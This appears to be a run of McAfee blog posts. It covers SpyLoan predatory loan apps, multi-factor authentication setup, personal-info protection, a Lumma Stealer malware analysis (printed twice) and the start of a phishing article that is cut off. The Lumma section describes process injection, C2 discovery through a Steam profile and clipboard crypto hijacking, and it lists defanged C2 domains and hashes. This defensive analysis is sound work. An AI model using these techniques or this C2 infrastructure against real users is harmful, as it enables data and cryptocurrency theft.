  • Network Type (WIfi, 4G, 3G, etc)
  • Phone number
  • Locale information (country code, display language)
  • Time Zone
  • Development Settings (enable or disable)
  • Phone Type (GSM, CDMA)
  • Elapsed Real-Time (The elapsed time since device was booted)
  • Proxy Configuration
• SIM Information
  • SIM country ISO Code
  • SIM Serial Number (ICCID)
• Location:
  • Permission: It checks for ACCESS_COARSER_LOCATION
  • Location provider: Check if GPS or network location are available
  • Last known location: Latitude or longitude
  • Geocoding information (converts latitude and longitude into a structured address):
    • Country name
    • Admirative area
    • City
    • Street
    • Address Line
  • Device configuration
    • Number of images: It counts the number of images files in external storage
    • Test Mode: reports if the device is in test mode
    • Keyboard Configuration
    • Current time
    • Enabled accessibility services flag
  • OS Settings:
    • Android version details (version, sdk level, fingerprint, id, display build)
    • Hardware information (device name, product name, device model, hardware details, device brand, board info, device serial number)
    • System configuration (bootloader version, build host, build user, CPU info)
    • Network (radio version, system type, build tags)
  • Storage Information:
    • External storage path, size,
    • Internal storage: total size, available size.
    • Memory information: total RAM, available RAM
  • Sensor data

Data from sensors such as accelerometers, gyroscopes, magnetometers if available on the affected device. This information includes:

• Sensor type, sensor name, version, vendor, maximum range, minimum delay, power consumption, resolution.

Sensor data can be used for device fingerprinting and user’s behavioral monitoring.

• Battery Information:
  • Battery level
  • Battery status: Indicates if the devices is plugged
  • Other battery metadata: health, if present, voltage, battery technology, type, etc.
• Audio settings (maximum and current volume levels)

Victim Experiences

Users have reported alarming experiences, such as:

• Receiving threatening calls and death threats for delayed payments.
• Having personal photos and IDs misused to intimidate them.
• The app accesses their contacts to send harassing messages to friends and family.

Typical comments on fake loan apps:

For example, “Préstamo Seguro-Rápido, Seguro” had many fake positive reviews on Google Play while a few consistent users reviews that alleged abuse of the collected data, extorsion and harassment.

Meanwhile other apps receive similar negative comments:

Global Impact of SpyLoans Apps

Worldwide Issue with Local Variations

These threats are not confined to a single region; they’ve been reported globally with localized adaptations. Predatory loan apps activities have been identified worldwide not limited to the variants technically described in this post, the following incidents can provide a wider context of the impact of this threat:

• Asia:
  • India: Users faced harassment and data leaks from apps misusing granted permissions. Authorities have taken action against such apps
  • Southeast Asia: Countries like Thailand, Indonesia, Vietnam and Philippines have reported significant issues with these apps exploiting users’ financial vulnerabilities.
    • Bank of Thailand advise center
  • Africa:
    • Nigeria, Kenya, Uganda: Similar apps have led to financial fraud and unauthorized transactions, targeting a large unbanked population.
  • Latin America:
    • Mexico, Colombia, Chile and Peru: Users have reported threats and harassment, with apps misusing personal data for extortion.

Ranking of top 10 countries with highest prevalence of Fake Loans apps according to McAfee telemetry Q3 2024:

• India
• Mexico
• Philippines
• Indonesia
• Thailand
• Kenya
• Colombia
• Vietnam
• Chile
• Nigeria

Law Enforcement Actions

According to a report by the Judiciary of Peru, authorities conducted a major raid on a call center engaged in extortion and the operation of fake loan apps targeting individuals in Peru, Mexico, and Chile. 

The police reported that over 300 individuals were linked to this criminal operation, which had defrauded at least 7,000 victims across multiple countries. 

The call center employees were trained specifically to extort victims. Using information collected from the SpyLoan apps, they threatened users to extract as much money as possible by imposing inflated interest rates and additional fees. 

Meanwhile in Chile, the commission for commission for the financial market (CMF) highlights in their website tens of fraudulent credit applications that has been distributed on Google Play, also the national consumer service (SERNAC) reports more cases. 

In May 2024, the Chilean police has detained over 25 people linked to one Fake Loans operations that scammed over 2,000 victims according to La Tercera. 

Despite the efforts the activity of these malware applications continues and increases in South America and the rest of the world. 

Conclusion

The threat of Android apps like SpyLoan is a global issue that exploits users’ trust and financial desperation. These apps leverage social engineering to bypass technical security measures and inflict significant harm on individuals. Despite law enforcement actions to capture multiple groups linked to the operation of SpyLoan apps, new operators and cybercriminals continue to exploit these fraud activities, especially in South America, Southeast Asia and Africa.

SpyLoan apps operate with similar code at app and C2 level across different continents this suggest the presence of a common developer or a shared framework that is being sold to cybercriminals. This modular approach allows these developers to quickly distribute malicious apps tailored to various markets, exploiting local vulnerabilities while maintaining a consistent model for scamming users.

By reusing code and tactics, they can efficiently target different countries, often evading detection by authorities and creating a widespread problem that is difficult to combat. This networked approach not only increases the scale of the threat but also complicates efforts to trace and shut down these operations, as they can easily adapt and relocate their operations to new regions.

By understanding how these malicious apps operate and taking proactive steps to protect ourselves, we can mitigate the risks and help others do the same.

How To Protect Yourself: Tips and Recommendations

Be Cautious with Permissions

• Review Permissions Carefully: Be wary of apps requesting permissions that seem unnecessary for their function.
• Limit Permissions: Deny permissions that are not essential.

Verify App Legitimacy

• License and Registration: Ensure the institution is registered and licensed to operate in your country. Verify with your financial regulator’s authority or consumer protection agency.
• Read User Reviews: Look for patterns of complaints about fraud or data misuse, pay special attention in apps with polarized reviews that might contain fake positive reviews.
• Research the Developer: Look up the developer’s name, website, and reviews. Even if the app contains privacy policy which is mandatory on Google Play this might not be honored by scammers.

Use Security Measures

• Install Security Software: Use reputable antivirus and anti-malware apps.
• Keep Your Device Updated: Regular updates can protect against vulnerabilities.

Practice Safe Online Behavior

• Don’t Share Sensitive Information: Provide personal data only to trusted and verified entities.
• Be Skeptical of Unrealistic Offers: If it sounds too good to be true, it probably is.

Report Suspicious Activity

• Notify App Stores: Report fraudulent apps to help protect others.
• Contact Authorities: If you’re a victim, report the incident to local law enforcement or cybercrime units.

IOC

The post SpyLoan: A Global Threat Exploiting Social Engineering appeared first on McAfee Blog.

Two-step verification, two-factor authentication, multi-factor authentication…whatever your social media platform calls it, it’s an excellent way to protect your accounts.

There’s a good chance you’re already using multi-factor verification with your other accounts — for your bank, your finances, your credit card, and any number of things. The way it requires an extra one-time code in addition to your login and password makes life far tougher for hackers.

It’s increasingly common to see nowadays, where all manner of online services only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone. That’s where two-step verification comes in. You get sent a code as part of your usual login process (usually a six-digit number), and then you enter that along with your username and password.

Some online services also offer the option to use an authenticator app, which sends the code to a secure app rather than via email or your smartphone. Authenticator apps work much in the same way, yet they offer three unique features:

• They keep the authentication code local to your device, rather than sending it unencrypted over email or text.
• This makes it more secure than email- and text-based authentication because they can be intercepted.
• It can also provide codes for multiple accounts, not just your social media account.

Google, Microsoft, and others offer authenticator apps if you want to go that route. You can get a good list of options by checking out the “editor’s picks” at your app store or in trusted tech publications.

Whichever form of authentication you use, always keep that secure code to yourself. It’s yours and yours alone. Anyone who asks for that code, say someone masquerading as a customer service rep, is trying to scam you. With that code, and your username/password combo, they can get into your account.

Before we talk about multi-factor verification, let’s talk about passwords

Passwords and two-step verification work hand-in-hand to keep you safer. Yet not any old password will do. You’ll want a strong, unique password. Here’s how that breaks down:

• Strong: A combination of at least 12 uppercase letters, lowercase letters, symbols, and numbers. Hacking tools look for word and number patterns. By mixing the types of characters, you break the pattern and keep your account safe.
• Unique: Every one of your accounts should have its own password. Yes, all. And if that sounds like a lot of work, a password manager can do the work for you. It creates strong, unique passwords and stores them securely.

Now, with strong passwords in place, you can get to setting up multi-factor verification on your social media accounts.

Multi-factor authentication for Facebook

1. Click on your profile picture in the top right, then click  Settings and Privacy.
2. Click Settings.
3. Click Accounts Center, then click Password and Security.
4. Click Two-factor authentication, then click on the account that you’d like to update.
5. Choose the security method you want to add and follow the on-screen instructions.

When you set up two-factor authentication on Facebook, you’ll be asked to choose one of three security methods:

• Tapping your security key on a compatible device.
• Login codes from a third-party authentication app.
• Text message (SMS) codes from your mobile phone.

And here’s a link to the company’s full walkthrough: https://www.facebook.com/help/148233965247823

Multi-factor authentication for Instagram

1. Click More in the bottom left, then click Settings.
2. Click See more in Accounts Center, then click Password and Security.
3. Click Two-factor authentication, then select an account.
4. Choose the security method you want to add and follow the on-screen instructions.

When you set up two-factor authentication on Instagram, you’ll be asked to choose one of three security methods: an authentication app, text message, or WhatsApp.

And here’s a link to the company’s full walkthrough: https://help.instagram.com/566810106808145

Multi-factor authentication for WhatsApp

1. Open WhatsApp Settings.
2. Tap Account > Two-step verification > Turn on or Set up PIN.
3. Enter a six-digit PIN of your choice and confirm it.
4. Provide an email address you can access or tap Skip if you don’t want to add an email address. (Adding an email address lets you reset two-step verification as needed, which further protects your account.
5. Tap Next.
6. Confirm the email address and tap Save or Done.

And here’s a link to the company’s full walkthrough: https://faq.whatsapp.com/1920866721452534

Multi-factor authentication for YouTube (and other Google accounts)

1. Open your Google Account.
2. In the navigation panel, select Security.
3. Under “How you sign in to Google,” select 2-Step Verification > Get started.
4. Follow the on-screen steps.

And here’s a link to the company’s full walkthrough: https://support.google.com/accounts/answer/185839?hl=en&co=GENIE.Platform%3DDesktop

Multi-factor authentication for TikTok

1. TapProfileat the bottom of the screen.
2. Tap the Menu button at the top.
3. Tap Settings and Privacy, then Security.
4. Tap 2-step verification and choose at least two verification methods: SMS (text), email, and authenticator app.
5. Tap Turn on to confirm.

And here’s a link to the company’s full walkthrough: https://support.tiktok.com/en/account-and-privacy/personalized-ads-and-data/how-your-phone-number-is-used-on-tiktok

The post How to Protect Your Social Media Passwords with Multi-factor Verification appeared first on McAfee Blog.

Whether it tags along via a smartphone, laptop, tablet, or wearable, it seems like the internet follows us wherever we go nowadays. Yet there’s something else that follows us around as well — a growing body of personal info that we create while banking, shopping, and simply browsing the internet. And no doubt about it, our info is terrifically valuable.

What makes it so valuable? It’s no exaggeration to say that your personal info is the key to your digital life, along with your financial and civic life as well. Aside from using it to create accounts and logins, it’s further tied to everything from your bank accounts and credit cards to your driver’s license and your tax refund.

Needless to say, your personal info is something that needs protecting, so let’s check out several ways you can do just that.

What is personal info?

What is personal info? It’s info about you that others can use to identify you either directly or indirectly. Thus, that info could identify you on its own. Or it could identify you when it’s linked to other identifiers, like the ones linked with the devices, apps, tools, and protocols you use.

A prime example of direct personal info is your tax ID number because it’s unique and directly tied to your name. Further instances include your facial image to unlock your smartphone, your medical records, your finances, and your phone number because each of these can be easily linked back to you.

Then there are those indirect pieces of personal info that act as helpers. While they might not identify you on their own, a few of them can when they’re added together. These helpers include things like internet protocol addresses, the unique device ID of your smartphone, or other identifiers such as radio frequency identification tags.

You can also find pieces of your personal info in the accounts you use, like your Google to Apple IDs, which can be linked to your name, your email address, and the apps you have. You’ll also find it in the apps you use. For example, there’s personal info in the app you use to map your walks and runs, because the combination of your smartphone’s unique device ID and GPS tracking can be used in conjunction with other info to identify who you are. Not to mention where you typically like to do your 5k hill days. The same goes for messenger apps, which can collect how you interact with others, how often you use the app, and your location info based on your IP address, GPS info, or both.

In all, there’s a cloud of personal info that follows us around as we go about our day online. Some wisps of that cloud are more personally identifying than others. Yet gather enough of it, and your personal info can create a high-resolution snapshot of you — who you are, what you’re doing, when you’re doing it, and even where you’re doing it, too — particularly if it gets into the wrong hands.

Remember Pig-Pen, the character straight from the old funny pages of Charles Schultz’s Charlie Brown? He’s hard to forget with that ever-present cloud of dust following him around. Charlie Brown once said, “He may be carrying the soil that trod upon by Solomon or Nebuchadnezzar or Genghis Khan!” It’s the same with us and our personal info, except the cloud surrounding us, isn’t the dust of kings and conquerors. They’re motes of info that are of tremendously high value to crooks and bad actors — whether for purposes of identity theft or invasion of privacy.

Protecting your personal info protects your identity and privacy

With all the personal info we create and share on the internet, that calls for protecting it. Otherwise, our personal info could fall into the hands of a hacker or identity thief and end up getting abused, in potentially painful and costly ways.

Here are several things you can do to help ensure that what’s private stays that way:

1) Use a complete security platform that can also protect your privacy.

Square One is to protect your devices with comprehensive online protection software. This defends you against the latest virus, malware, spyware, and ransomware attacks plus further protects your privacy and identity. Also, it can provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who might try to force their way into your accounts.

Further, security software can also include a firewall that blocks unwanted traffic from entering your home network, such as an attacker poking around for network vulnerabilities so that they can “break in” to your computer and steal info.

2) Use a VPN.

Also known as a virtual private network, a VPN helps protect your vital personal info and other data with bank-grade encryption. The VPN encrypts your internet connection to keep your online activity private on any network, even public networks. Using a public network without a VPN can increase your risk because others on the network can potentially spy on your browsing and activity.

If you’re new to the notion of using a VPN, check out this article on VPNs and how to choose one so that you can get the best protection and privacy possible. (Our McAfee+ plans offer a VPN as part of your subscription.)

3) Keep a close grip on your Social Security Number.

In the U.S., the Social Security Number (SSN) is one of the most prized pieces of personal info as it unlocks the door to employment, finances, and much more. First up, keep a close grip on it. Literally. Store your card in a secure location. Not your purse or wallet.

Certain businesses and medical practices might ask you for your SSN for billing purposes and the like. You don’t have to provide it (although some businesses could refuse service if you don’t), and you can always ask if they will accept some alternative form of info. However, there are a handful of instances where an SSN is a requirement. These include:

• Employment or contracting with a business.
• Group health insurance.
• Financial and real estate transactions.
• Applying for credit cards, car loans, and so forth.

Be aware that hackers often get a hold of SSNs because the organization holding that info gets hacked or compromised itself. Minimizing how often you provide your SSN can offer an extra degree of protection.

4) Protect your files.

Protecting your files with encryption is a core concept in data and info security, and thus it’s a powerful way to protect your personal info. It involves transforming data or info into code that requires a digital key to access it in its original, unencrypted format. For example, McAfee+ includes File Lock, which is our file encryption feature that lets you lock important files in secure digital vaults on your device.

Additionally, you can also delete sensitive files with an application such as McAfee Shredder, which securely deletes files so that thieves can’t access them. (Quick fact: deleting files in your trash doesn’t delete them in the truest sense. They’re still there until they’re “shredded” or otherwise overwritten such that they can’t be restored.)

5) Steer clear of those internet “quizzes.”

Which Marvel Universe superhero are you? Does it really matter? After all, such quizzes and social media posts are often grifting pieces of your personal info in a seemingly playful way. While you’re not giving up your SSN, you might be giving up things like your birthday, your pet’s name, your first car…things that people often use to compose their passwords or use as answers to common security questions on banking and financial sites. The one way to pass this kind of quiz is not to take it!

6) Be on the lookout for phishing attacks.

A far more direct form of separating you from your personal info is phishing attacks. Posing as emails from known or trusted brands, financial institutions, or even a friend or family member, a scammer’s attack will try to trick you into sharing important info like your logins, account numbers, credit card numbers, and so on under the guise of providing customer service.

How do you spot such emails? Well, it’s getting a little tougher nowadays because scammers are getting more sophisticated and can make their phishing emails look increasingly legitimate. Even more so with AI tools. However, there are several ways you can spot a phishing email and phony websites. Moreover, our McAfee Scam Protection can do it for you.

7) Keep mum in your social media profile.

You can take two steps to help protect your personal info from being at risk via social media. One, think twice about what you share in that post or photo — like the location of your child’s school or the license plate on your car. Two, set your profile to private so that only friends can see it. Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy and gives a scammer less info to exploit. Using our Social Privacy Manager can make that even easier. With only a few clicks, it can adjust more than 100 privacy settings across their social media accounts — making them more private as a result.

8) Look for HTTPS when you browse.

The “S” stands for secure. Any time you’re shopping, banking, or sharing any kind of personal info, look for “https” at the start of the web address. Some browsers also indicate HTTPS by showing a small “lock” icon. Doing otherwise on plain HTTP sites exposes your personal info for anyone who cares to monitor that site for unsecured connections.

9) Lock your devices.

By locking your devices, you protect yourself that much better from personal info and data theft in the event your device is lost, stolen, or even left unattended for a short stretch. Use your password, PIN, facial recognition, thumbprint ID, what have you. Just lock your stuff. In the case of your smartphones, read up on how you can locate your phone or even wipe it remotely if you need to. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well.

10) Keep tabs on your credit — and your personal info.

Theft of your personal info can lead to credit cards and other accounts being opened falsely in your name. What’s more, it can take some time before you even become aware of it, such as when your credit score takes a hit or a bill collector comes calling. By checking your credit, you can fix any issues that come up, as companies typically have a clear-cut process for contesting any fraud. You can get a free credit report in the U.S. via the Federal Trade Commission (FTC) and likewise, other nations like the UK have similar free offerings as well.

Consider identity theft protection as well. A strong identity theft protection package pairs well with keeping track of your credit and offers cyber monitoring that scans the dark web to detect for misuse of your personal info. With our identity protection service, we help relieve the burden of identity theft if the unfortunate happens to you with $2M coverage for lawyer fees, travel expenses, lost wages, and more.

The post How to Protect Your Personal Info appeared first on McAfee Blog.

Authored by: M.

Authored by: M, Mohanasundaram and Neil Tyagi

In today’s rapidly evolving cyber landscape, malware threats continue to adapt, employing new tactics and leveraging popular platforms to reach unsuspecting victims. One such emerging threat is the Lumma Stealer—a potent information-stealing malware recently gaining traction through Telegram channels. With Telegram’s popularity as a messaging and sharing platform, threat actors have identified it as a lucrative distribution vector, bypassing traditional detection mechanisms and reaching a broad, often unsuspecting audience.

Fortunately, McAfee’s advanced security solutions are equipped to detect and mitigate threats like Lumma Stealer. Through cutting-edge threat intelligence, behavioral analysis, and real-time monitoring, McAfee provides robust defenses against this malware, helping users secure their personal data and digital assets. In this blog, we will explore the tactics, techniques, and procedures (TTPs) used by Lumma Stealer, examine its capabilities, and discuss how McAfee solutions can help safeguard users from this rapidly spreading threat.

• Telegram channel offering malware disguised as crack software
• https[:]//t[.]me/hitbase
• Notice the high subscriber count of 42k.
• Last post on 3^rd Nov

• Another example of a telegram channel offering malware to benign users.
• https[:]//t[.]me/sharmamod
• Subscriber count 8.66k
• Last post on 3^rd Nov

• Also notice that both the channels are related as they are forwarding messages from each other’s telegram channel.
• McAfee detects these fake crack software as [Trojan:Win/Lummastealer.SD]
• Threat Prevalence observed as per McAfee telemetry data.
• India is most affected by this threat, followed by the USA and Europe.

• This blog will dissect one specific file, CCleaner 2024.rar. The others are similar in nature except for the theme.
• The hash for this file is 3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b.

• The extracted rar contains Microsoft DLL files

• Readme.txt contains the link to the telegram channel

• CCleaner 2024.exe is a .NET application

• We load the file into Dnspy and check the main function.

• In this, we have two calls to a function UninitializeBuilder, which decrypts the blob of data that is passed to it (AIOsncoiuuA & UserBuffer) along with the key (Alco and key).

• Decryption Key (Alco) and Encrypted data (AIOsncoiuuA) for the first call.

• Decryption Key (Key) and Encrypted data (UserBuffer) for the Second call.

• Snippet of the decryption Function.

• Decrypted data is saved into variable uiOAshyuxgYUA.
• We put a breakpoint on the end of this function and run the program to get the decrypted value of each call.
• For the first call, we get the following decrypted data in memory. We see process injection API calls were decrypted in memory.

• We can also see the target program in which the process injection will take place, in this case, RegAsm.exe.
• We can confirm this through the process tree.

• We let the breakpoint hit again to get the next layer decrypted PE file

• We can observe the decrypted PE bytes, dump this payload to disk, and inspect the next stage.
• Stage1 is a V C++ compiled file.

• We checked the payload sections and discovered that it holds encrypted data.

• Snippet of the decryption loop.

• Following decryption, the data is written to two files in the AppData Roaming folder.

• The first payload written in the AppData\Roaming folder is the .NET file “XTb9DOBjB3.exe”(Lumma_stealer) and the second payload also .Net file “bTkEBBlC4H.exe”(clipper).

• Upon examining both payloads, we observed that they employ the same decryption logic as the main file(ccleaner).

Lumma stealer:

• After dumping the payload from the .NET file, we discovered it is a 32-bit GUI Portable Executable.
• “winhttp.dll is dynamically loaded into the program using the LoadLibraryExW function.

• Upon inspecting the PE file, Base64-encoded strings were identified within the binary.

• The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• We observe that the Plaintext resembles a domain, and it’s used to establish communication with a threat actor to exfiltrate the data.

• Code snippet for WinHttpOpenRequest:

List of Requests with post method:

• “hxxps://snarlypagowo.site/api”
• “hxxps://questionsmw.store/api”
• “hxxps://soldiefieop.site/api”
• “hxxps://abnomalrkmu.site/api”
• “hxxps://chorusarorp.site/api”
• “hxxps://treatynreit.site/api”
• “hxxps://mysterisop.site/api”
• “hxxps://absorptioniw.site/api”

At last, it connects to the steam community

• (hxxps://steamcommunity.com/profiles/76561199724331900),

The malware extracts the Steam account name, initially obfuscated to evade detection, and decodes it to reveal the C2 domain. This step is essential for establishing a connection between the compromised device and the attacker’s server, allowing further malicious activity such as data exfiltration and additional payload delivery. By using this technique, the attackers effectively bypass basic detection mechanisms, making it harder for traditional security solutions to identify the communication with the C2 server.

• This is the snippet of the Steam community:

• Upon checking the data, it was observed that the user’s name was obfuscated and had many aliases. We observed that the actual_persona_name fetched and it deobfuscated by the below code.

• Upon de-obfuscation, we found the plain text and its domain “marshal-zhukov.com”.

• Upon establishing a connection, the C2 server responded with configuration data in Base64 encoded format. The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• Config for collecting wallet information.

• For Browser information:

• For FTP and email information:

• It also collects system information and sends it to c2.

• Clipper:
• Once we dumped the payload from the .NET file, we found that it was a 32-bit .NET executable named “Runtime64.exe.”

• We load the file into dnspy and check the main function.

• It begins by checking the mutex(“sodfksdkfalksdasgpkprgasdgrrkgwhrterheegwsdfwef”) to see if it’s already running on the machine.
• Autorun.is_installed: This function checks if the program is set to run on system startup. If autorun is not configured, it adds one to enable automatic execution on startup.

• This file sets the hidden attribute to false to remove the hidden status and set it as a system file to protect it.

• This Clipboard Monitor.run function Uses the following regex patterns to match the wallet addresses.

• If it matches, it replaces the clipboard content with the specified address to hijack the cryptocurrency.

• Code snippet for clipboard monitor and replacement:

Conclusion

The Lumma Stealer is a stark reminder of the ever-evolving nature of cyber threats and the rapid adaptability of malware tactics. Its spread through Telegram channels demonstrates how easily threat actors can exploit popular platforms to distribute malicious code to a broad audience. With Lumma Stealer capable of stealing sensitive information and compromising user privacy, the potential damage it can cause is significant.

In this increasingly dangerous cyber landscape, having robust, up-to-date protection has never been more crucial. McAfee’s advanced threat detection and proactive defense mechanisms provide users with a vital safeguard against such threats. By combining real-time monitoring, behavioral analysis, and continuous updates to counter new TTPs, McAfee helps users stay one step ahead of malicious actors. As TTPs evolve rapidly, maintaining comprehensive antivirus protection is essential to safeguarding personal data, financial information, and privacy. Staying vigilant and equipped with the proper security solutions ensures that users are prepared to face the latest threats head-on.

Indicators of Compromise

Mohanasundaram and Neil Tyagi

In today’s rapidly evolving cyber landscape, malware threats continue to adapt, employing new tactics and leveraging popular platforms to reach unsuspecting victims. One such emerging threat is the Lumma Stealer—a potent information-stealing malware recently gaining traction through Telegram channels. With Telegram’s popularity as a messaging and sharing platform, threat actors have identified it as a lucrative distribution vector, bypassing traditional detection mechanisms and reaching a broad, often unsuspecting audience.

Fortunately, McAfee’s advanced security solutions are equipped to detect and mitigate threats like Lumma Stealer. Through cutting-edge threat intelligence, behavioral analysis, and real-time monitoring, McAfee provides robust defenses against this malware, helping users secure their personal data and digital assets. In this blog, we will explore the tactics, techniques, and procedures (TTPs) used by Lumma Stealer, examine its capabilities, and discuss how McAfee solutions can help safeguard users from this rapidly spreading threat.

• Telegram channel offering malware disguised as crack software
• https[:]//t[.]me/hitbase
• Notice the high subscriber count of 42k.
• Last post on 3^rd Nov

• Another example of a telegram channel offering malware to benign users.
• https[:]//t[.]me/sharmamod
• Subscriber count 8.66k
• Last post on 3^rd Nov

• Also notice that both the channels are related as they are forwarding messages from each other’s telegram channel.
• McAfee detects these fake crack software as [Trojan:Win/Lummastealer.SD]
• Threat Prevalence observed as per McAfee telemetry data.
• India is most affected by this threat, followed by the USA and Europe.

• This blog will dissect one specific file, CCleaner 2024.rar. The others are similar in nature except for the theme.
• The hash for this file is 3df7a19969e54bd60944372e925ad2fb69503df7159127335f792ad82db7da0b.

• The extracted rar contains Microsoft DLL files

• Readme.txt contains the link to the telegram channel

• CCleaner 2024.exe is a .NET application

• We load the file into Dnspy and check the main function.

• In this, we have two calls to a function UninitializeBuilder, which decrypts the blob of data that is passed to it (AIOsncoiuuA & UserBuffer) along with the key (Alco and key).

• Decryption Key (Alco) and Encrypted data (AIOsncoiuuA) for the first call.

• Decryption Key (Key) and Encrypted data (UserBuffer) for the Second call.

• Snippet of the decryption Function.

• Decrypted data is saved into variable uiOAshyuxgYUA.
• We put a breakpoint on the end of this function and run the program to get the decrypted value of each call.
• For the first call, we get the following decrypted data in memory. We see process injection API calls were decrypted in memory.

• We can also see the target program in which the process injection will take place, in this case, RegAsm.exe.
• We can confirm this through the process tree.

• We let the breakpoint hit again to get the next layer decrypted PE file

• We can observe the decrypted PE bytes, dump this payload to disk, and inspect the next stage.
• Stage1 is a V C++ compiled file.

• We checked the payload sections and discovered that it holds encrypted data.

• Snippet of the decryption loop.

• Following decryption, the data is written to two files in the AppData Roaming folder.

• The first payload written in the AppData\Roaming folder is the .NET file “XTb9DOBjB3.exe”(Lumma_stealer) and the second payload also .Net file “bTkEBBlC4H.exe”(clipper).

• Upon examining both payloads, we observed that they employ the same decryption logic as the main file(ccleaner).

Lumma stealer:

• After dumping the payload from the .NET file, we discovered it is a 32-bit GUI Portable Executable.
• “winhttp.dll is dynamically loaded into the program using the LoadLibraryExW function.

• Upon inspecting the PE file, Base64-encoded strings were identified within the binary.

• The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• We observe that the Plaintext resembles a domain, and it’s used to establish communication with a threat actor to exfiltrate the data.

• Code snippet for WinHttpOpenRequest:

List of Requests with post method:

• “hxxps://snarlypagowo.site/api”
• “hxxps://questionsmw.store/api”
• “hxxps://soldiefieop.site/api”
• “hxxps://abnomalrkmu.site/api”
• “hxxps://chorusarorp.site/api”
• “hxxps://treatynreit.site/api”
• “hxxps://mysterisop.site/api”
• “hxxps://absorptioniw.site/api”

At last, it connects to the steam community

• (hxxps://steamcommunity.com/profiles/76561199724331900),

The malware extracts the Steam account name, initially obfuscated to evade detection, and decodes it to reveal the C2 domain. This step is essential for establishing a connection between the compromised device and the attacker’s server, allowing further malicious activity such as data exfiltration and additional payload delivery. By using this technique, the attackers effectively bypass basic detection mechanisms, making it harder for traditional security solutions to identify the communication with the C2 server.

• This is the snippet of the Steam community:

• Upon checking the data, it was observed that the user’s name was obfuscated and had many aliases. We observed that the actual_persona_name fetched and it deobfuscated by the below code.

• Upon de-obfuscation, we found the plain text and its domain “marshal-zhukov.com”.

• Upon establishing a connection, the C2 server responded with configuration data in Base64 encoded format. The encoded data is first decoded from Base64 format, converting it back into binary. The decoded data is then passed through a decryption routine to recover the plaintext.

• Config for collecting wallet information.

• For Browser information:

• For FTP and email information:

• It also collects system information and sends it to c2.

• Clipper:
• Once we dumped the payload from the .NET file, we found that it was a 32-bit .NET executable named “Runtime64.exe.”

• We load the file into dnspy and check the main function.

• It begins by checking the mutex(“sodfksdkfalksdasgpkprgasdgrrkgwhrterheegwsdfwef”) to see if it’s already running on the machine.
• Autorun.is_installed: This function checks if the program is set to run on system startup. If autorun is not configured, it adds one to enable automatic execution on startup.

• This file sets the hidden attribute to false to remove the hidden status and set it as a system file to protect it.

• This Clipboard Monitor.run function Uses the following regex patterns to match the wallet addresses.

• If it matches, it replaces the clipboard content with the specified address to hijack the cryptocurrency.

• Code snippet for clipboard monitor and replacement:

Conclusion

The Lumma Stealer is a stark reminder of the ever-evolving nature of cyber threats and the rapid adaptability of malware tactics. Its spread through Telegram channels demonstrates how easily threat actors can exploit popular platforms to distribute malicious code to a broad audience. With Lumma Stealer capable of stealing sensitive information and compromising user privacy, the potential damage it can cause is significant.

In this increasingly dangerous cyber landscape, having robust, up-to-date protection has never been more crucial. McAfee’s advanced threat detection and proactive defense mechanisms provide users with a vital safeguard against such threats. By combining real-time monitoring, behavioral analysis, and continuous updates to counter new TTPs, McAfee helps users stay one step ahead of malicious actors. As TTPs evolve rapidly, maintaining comprehensive antivirus protection is essential to safeguarding personal data, financial information, and privacy. Staying vigilant and equipped with the proper security solutions ensures that users are prepared to face the latest threats head-on.

Indicators of Compromise

The post Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation appeared first on McAfee Blog.

How do you recognize phishing emails and texts? Even as many of the scammers behind them have sophisticated their attacks, you can still pick out telltale signs.

Common to them all, every phishing is a cybercrime that aims to steal your sensitive info. Personal info. Financial info. Other attacks go right for your wallet by selling bogus goods or pushing phony charities.

You’ll find scammers posing as major corporations, friends, business associates, and more. They might try to trick you into providing info like website logins, credit and debit card numbers, and even precious personal info like your Social Security Number.

How do you spot a phishing message?

Phishing scammers often undo their own plans by making simple mistakes that are easy to spot once you know how to recognize them. Check for the following signs of phishing when you open an email or check a text:

It’s poorly written.

Even the biggest companies sometimes make minor errors in their communications. Phishing messages often contain grammatical errors, spelling mistakes, and other blatant errors that major corporations wouldn’t make. If you see glaring grammatical errors in an email or text that asks for your personal info, you might be the target of a phishing scam.

The logo doesn’t look right.

Phishing scammers often steal the logos of the businesses they impersonate. However, they don’t always use them correctly. The logo in a phishing email or text might have the wrong aspect ratio or low resolution. If you have to squint to make out the logo in a message, the chances are that it’s phishing.

The URL doesn’t match.

Phishing always centers around links that you’re supposed to click or tap. Here are a few ways to check whether a link someone sent you is legitimate:

• On computers and laptops, you can hover your cursor over links without clicking on them to see the web address. On mobile devices, you can carefully check the address by holding down the link (not tapping it).
• Take a close look at the addresses the message is using. If it’s an email, look at the email address. Often, phishing URLs contain misspellings. Maybe the address doesn’t match the company or organization at all. Or maybe it looks like it almost does, yet it adds a few letters or words to the name. This marks yet another sign that you might have a phishing attack on your hands.
• Scammers also use the common tactic of a link shortener, which creates links that almost look like strings of indecipherable text. These shortened links mask the true address, which might indeed be a link to a scam site. Delete the message. If possible, report it. Many social media platforms and messaging apps have built-in controls for reporting suspicious accounts and messages.

What kind of phishing scams are there?

You can also spot a phishing attack when you know what some of the most popular scams are:

The CEO Scam

This scam appears as an email from a leader in your organization, asking for highly sensitive info like company accounts, employee salaries, and Social Security numbers. The hackers “spoof”, or fake, the boss’ email address so it looks like a legitimate internal company email. That’s what makes this scam so convincing — the lure is that you want to do your job and please your boss. But keep this scam in mind if you receive an email asking for confidential or highly sensitive info. Ask the apparent sender directly whether the request is real before acting.

The Urgent Email Attachment

Phishing emails that try to trick you into downloading a dangerous attachment that can infect your computer and steal your private info have been around for a long time. This is because they work. You’ve probably received emails asking you to download attachments confirming a package delivery, trip itinerary, or prize. They might urge you to “respond immediately!” The lure here is offering you something you want and invoking a sense of urgency to get you to click.

The “Lucky” Text or Email

